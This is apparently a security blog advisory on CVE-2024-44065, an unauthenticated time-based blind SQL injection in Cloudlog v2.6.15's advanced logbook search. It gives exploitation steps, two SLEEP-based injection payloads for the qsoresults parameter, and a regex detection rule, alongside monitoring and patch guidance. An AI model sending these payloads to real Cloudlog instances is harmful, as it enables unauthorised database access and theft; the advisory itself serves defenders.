CVE-2024-44065: When a Logbook Search Becomes a Full Database Breach

Aegiron 7 mins0

Vulnerability Overview

CVE Name: Cloudlog Time-Based Blind SQL Injection via qsoresults Parameter

CVE ID: CVE-2024-44065

CWE ID: CWE-89 – Improper Neutralization of Special Elements Used in an SQL Command (SQL Injection)

Disclosure Date: December 2025

Severity & Risk Rating

CVSS v3.1 Score: 9.8 / 10
Severity: CRITICAL

CVSS Vector:
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H

Risk Breakdown

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Unchanged
  • Impact Type:
    • Full database disclosure
    • Data modification or deletion
    • Complete application compromise
    • Potential server takeover depending on database privileges

Overall Risk:
This is a fully remote, unauthenticated, critical SQL injection vulnerability that allows an attacker to interact directly with the backend database without logging in.

Exploitability & Threat Status

Exploitability: Very High

Exploit Availability:

  • A public proof-of-concept (PoC) is available
  • The attack technique is simple, reliable, and reproducible
  • Exploitation does not require special tools beyond standard SQL injection testing utilities

Likely Threat Actors:

  • Opportunistic internet scanners
  • Automated botnets
  • Malicious researchers
  • Attackers targeting amateur radio and logging platforms
  • Ransomware operators seeking easy entry points

This vulnerability is especially dangerous because Cloudlog instances are often public-facing and self-hosted.

Affected Product Details

Product: Cloudlog
Deployment Type: Self-hosted web application
Affected Version:

  • Cloudlog v2.6.15

Vulnerable Endpoint:

/index.php/logbookadvanced/search

Vulnerable Parameter:

qsoresults

Vulnerability Description

CVE-2024-44065 is caused by improper input handling of the qsoresults parameter in the advanced logbook search functionality.

The application fails to properly sanitize user-supplied input before embedding it into an SQL query. While error messages are suppressed, the backend database still processes injected SQL statements.

Because of this, an attacker can execute time-based blind SQL injection, allowing them to infer database responses by observing server response delays.

Even without visible error messages or query output, this technique allows full database extraction over time.

How the Vulnerability Can Be Exploited

Attack Prerequisites

An attacker only needs:

  • Network access to a Cloudlog instance
  • No authentication
  • No user interaction
  • No prior knowledge of the database structure

Exploitation Steps

  1. The attacker identifies a publicly accessible Cloudlog instance.
  2. A crafted request is sent to the advanced search endpoint.
  3. The qsoresults parameter is injected with a time-delay SQL payload.
  4. The database executes the injected query.
  5. The attacker measures response times to confirm successful injection.
  6. Repeated requests allow:
    • Enumeration of database tables
    • Extraction of sensitive data
    • Modification or deletion of records

Detection Payloads (Time-Based)

MySQL-style payload example:

qsoresults=1' AND SLEEP(5)-- -

Conditional time-based payload:

qsoresults=1' AND IF(1=1,SLEEP(5),0)-- -

If the server response is delayed by ~5 seconds, the parameter is vulnerable.

Impact Scenarios

Successful exploitation can lead to:

  • Disclosure of:
    • User credentials
    • API keys
    • Logs and operational data
  • Modification of logbook entries
  • Deletion of entire databases
  • Persistence via database-stored payloads
  • Potential remote code execution if database permissions are misconfigured

Detection & Monitoring Guidance

What to Look For

HTTP Logs

  • Repeated requests to: /index.php/logbookadvanced/search
  • Suspicious SQL keywords in parameters:
    • SLEEP
    • BENCHMARK
    • IF(
    • SELECT
    • UNION

Behavioral Indicators

  • Repeated requests with increasing response times
  • Requests with unusual punctuation (', ", --, #)
  • Automated scanning patterns from unknown IPs

Example WAF / IDS Detection Rules

Generic SQL Injection Keyword Detection

qsoresults=.*(sleep|benchmark|union|select|if\s*\().*

Time-Based SQL Injection Heuristic

  • Alert on repeated delayed responses from the same IP
  • Alert on consistent response delays after parameter manipulation

Log Sources to Monitor

To detect exploitation attempts, monitor:

  • Web Server Access Logs (Apache / Nginx)
  • Application Logs (Cloudlog PHP logs)
  • Database Logs (Slow query logs, general query logs)
  • WAF Logs (if deployed)

Mitigation & Remediation

Immediate Actions

  • Restrict public access to the Cloudlog instance if possible
  • Apply WAF rules to block SQL injection patterns
  • Monitor logs for signs of compromise

Official Patch

The vulnerability has been addressed by the Cloudlog maintainers.

Official Patch / Upgrade Location:
https://github.com/magicbug/Cloudlog

Administrators are strongly advised to upgrade immediately and verify that no unauthorized database activity occurred prior to patching.

Final Risk Summary

CVE-2024-44065 represents a worst-case web application vulnerability:

  • Fully unauthenticated
  • Remote
  • Critical severity
  • Publicly exploitable
  • Impacts confidentiality, integrity, and availability

Any exposed Cloudlog v2.6.15 instance should be considered at high risk until patched.

Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.